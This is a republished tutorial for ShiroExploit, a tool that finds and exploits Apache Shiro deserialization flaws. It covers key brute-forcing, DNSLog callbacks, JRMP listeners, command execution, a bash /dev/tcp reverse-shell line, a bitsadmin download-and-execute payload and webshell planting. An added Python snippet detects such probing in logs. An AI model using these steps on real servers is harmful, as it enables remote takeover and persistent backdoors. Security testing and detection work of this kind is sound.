
How to use Shiro vulnerability detection tool ShiroExploit

2025-02-23 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This article explains how to use the Shiro vulnerability detection tool ShiroExploit. Interested readers may wish to take a look. The method introduced here is simple, fast and practical.

ShiroExploit

Supports one-click detection of Shiro550 (hard-coded key) and Shiro721 (Padding Oracle), and supports simple echo.

Instructions for use

Step 1: enter the target URL to be detected and select the vulnerability type

- Shiro550 does not require a rememberMe Cookie; Shiro721 requires a valid rememberMe Cookie.
- Shiro550 does not require selecting an operating system type; Shiro721 requires selecting the operating system type.
- A specific Key and Gadget can be specified manually. By default none is specified, and the program traverses all Keys and Gadgets.
- Complex HTTP requests are supported by pasting the packet directly.

Step 2: choose the mode of attack

Use ceye.io for vulnerability detection

- No configuration is required. The CEYE domain name and the corresponding Token are preset in the configuration file, and you can modify them.
- The program first uses URLDNS to filter out the unique Key, and then calls each Gadget in turn to generate a Payload.
- Disadvantage: the program uses the API http://api.ceye.io/v1/records?token=a78a1cb49d91fe09e01876078d1868b2&type=dns&filter=[UUID] to query the test results. Sometimes the API cannot be accessed properly, so the Key or a valid Gadget cannot be found this way.

Use dnslog.cn for vulnerability detection

- No configuration is required. The program automatically applies for a DNS Record from dnslog.cn each time it starts.
- The program first uses URLDNS to filter out the unique Key, and then calls each Gadget in turn to generate a Payload.
- Disadvantage: in a few cases dnslog.cn takes a long time to show the DNS resolution result, so the program cannot find the Key or a valid Gadget. In addition, dnslog.cn only records the last 10 DNS resolution records.

Use JRMP + dnslog for vulnerability detection

- You need to start HttpService/JRMPListener on a VPS with java -cp ShiroExploit.jar com.shiroexploit.server.BasicHTTPServer [HttpService Port] [JRMPListener Port], and fill in the corresponding IP and ports as required.
- If no port number is specified when starting HttpService/JRMPListener, HTTPService listens on port 8080 by default and JRMPListener listens on port 8088 by default.
- Using JRMP for vulnerability detection can significantly reduce the cookie size.
- The program first uses URLDNS to filter out the unique Key, and then uses JRMP to generate the corresponding JRMPListener for each Gadget in turn.

Use echo for vulnerability detection

- This mode is for vulnerability detection when the target cannot reach the external network. The number of Gadget types that can be detected is smaller than with DNSLog.
- At present, echo is mainly achieved by writing the result of command execution to the Web directory and then reading it back.
- You need to provide a static resource URL, and the program writes the file to the directory where the static resource is located.
- Note: at the beginning, echo was implemented using the method introduced in https://blog.csdn.net/fnmsd/article/details/106709736, which tested successfully locally. However, it is basically unsuccessful in real environments (there may be something wrong with my approach, discussion is welcome), so at present echo is achieved by reading and writing files. Other ways may be added at a later stage.

Step 3: detect vulnerabilities and execute commands

- While the program is determining whether the target application is vulnerable, the input box at the top of the window cannot be used.
- When the program detects a vulnerability in the target application, the input box becomes usable and commands can be entered and executed.
- Reverse shell (Linux): uses bash -i >& /dev/tcp/1.2.3.4/443 0>&1 to bounce a shell.
- Reverse shell (Windows): uses bitsadmin to download the exe file at the specified URL and executes it to get a shell.

- Get Webshell: writes a webshell directly under the path given by the user (the directory needs to exist). The webshell name and suffix are specified by the user, and the contents of the webshell are read from shell.jsp under the config directory.
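From the defender's side, the Key and Gadget traversal in step 1 and the DNSLog callbacks in step 2 both leave traces in logs. The following is an added example, not part of ShiroExploit or the original article: it flags clients that send many distinct rememberMe values and internal hosts that resolve names under ceye.io or dnslog.cn. The record fields (src, cookie, host, qname) and the thresholds are assumptions, and all sample records are constructed.

```python
# Added defensive example; all log records below are constructed sample data.
from collections import defaultdict

# DNSLog platforms named in the article; extend with your own blocklist.
DNSLOG_SUFFIXES = ("ceye.io", "dnslog.cn")
DISTINCT_COOKIE_THRESHOLD = 5   # assumed tuning value
LARGE_COOKIE_BYTES = 1024       # assumed tuning value

def cookie_value(cookie_header, name="rememberMe"):
    """Return the value of one cookie from a raw Cookie header, or None."""
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")  # keeps base64 '=' padding
        if key == name:
            return value
    return None

def find_key_traversal(http_records):
    """Flag clients sending many different rememberMe values (Key/Gadget traversal)."""
    seen = defaultdict(set)
    large = defaultdict(int)
    for rec in http_records:
        value = cookie_value(rec["cookie"])
        if value is None:
            continue
        seen[rec["src"]].add(value)
        if len(value) >= LARGE_COOKIE_BYTES:
            large[rec["src"]] += 1
    return {src: {"distinct": len(vals), "large": large[src]}
            for src, vals in seen.items() if len(vals) >= DISTINCT_COOKIE_THRESHOLD}

def find_dnslog_lookups(dns_records):
    """Flag internal hosts resolving names under a DNSLog platform domain."""
    hits = []
    for rec in dns_records:
        qname = rec["qname"].rstrip(".").lower()
        if any(qname == s or qname.endswith("." + s) for s in DNSLOG_SUFFIXES):
            hits.append((rec["host"], qname))
    return hits

# Constructed sample input: one probing client, one normal client, three DNS queries.
HTTP_SAMPLE = [{"src": "203.0.113.7", "cookie": f"JSESSIONID=x; rememberMe={'A' * 1200}{i}"} for i in range(8)]
HTTP_SAMPLE += [{"src": "198.51.100.20", "cookie": "JSESSIONID=y; rememberMe=bm9ybWFsLXVzZXI="}] * 3
DNS_SAMPLE = [{"host": "app01", "qname": "3f2a9c.example-id.ceye.io."},
              {"host": "app01", "qname": "updates.example.com."},
              {"host": "app02", "qname": "notdnslog.cn."}]

if __name__ == "__main__":
    print(find_key_traversal(HTTP_SAMPLE), find_dnslog_lookups(DNS_SAMPLE))
```

The suffix match is anchored on a label boundary, so a name such as notdnslog.cn is not flagged.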

Note: both the main vulnerability detection program and HttpService/JRMPListener need ysoserial.jar. You can put ysoserial.jar and ShiroExploit.jar in the same directory.

At this point, I believe you have a deeper understanding of how to use the Shiro vulnerability detection tool ShiroExploit. You might as well try it in practice.
